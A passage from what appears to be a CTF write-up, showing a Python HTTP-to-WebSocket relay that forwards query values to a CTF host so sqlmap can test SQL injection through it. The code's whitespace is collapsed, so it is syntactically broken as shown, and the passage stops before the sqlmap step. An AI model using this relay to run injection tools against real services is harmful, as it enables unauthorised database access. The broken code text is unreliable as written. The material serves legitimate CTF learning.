so using article-1 I made sure to understand the code and used it , also the code was made for the in-network server but we needed to connect to remote hosts over websockets so we used wss instead of ws in the protocol.
we also need to make sure that the negative id are not being transmitted as it's running sqlite3
so to do that we just imply a simple condition the code : if payload.startswith('-'): content="NOT sending due to -ve value"
code:
from http.server import SimpleHTTPRequestHandlerfrom socketserver import TCPServerfrom urllib.parse import unquote, urlparsefrom websocket import create_connectionws_server ="wss://bountyrepo.ctf.intigriti.io/ws"defsend_ws(payload): ws =create_connection(ws_server)# If the server returns a response on connect, use below line # resp = ws.recv() # If server returns something like a token on connect you can find and extract from here# For our case, format the payload in JSON message =unquote(payload).replace('"', '\'')# replacing " with ' to avoid breaking JSON structure data ='{"employeeID":"%s"}'% message ws.send(data) resp = ws.recv() ws.close()if resp:return respelse:return''defmiddleware_server(host_port,content_type="text/plain"):classCustomHandler(SimpleHTTPRequestHandler):defdo_GET(self) ->None: self.send_response(200)try: payload =urlparse(self.path).query.split('=', 1)[1]exceptIndexError: payload =Falseif payload:if payload.startswith('-'): content ="Skipped due to negative id as it freezes on negative id"else: content =send_ws(payload)else: content ='No parameters specified!' self.send_header("Content-type", content_type) self.end_headers() self.wfile.write(content.encode())returnclass_TCPServer(TCPServer): allow_reuse_address =True httpd =_TCPServer(host_port, CustomHandler) httpd.serve_forever()print("[+] Starting MiddleWare Server")print("[+] Send payloads in http://localhost:8081/?id=*")try:middleware_server(('0.0.0.0', 8081))exceptKeyboardInterrupt:pass
now this is our middle ware -> we'll send the request to him via sqlmap and this will forward it over websocket: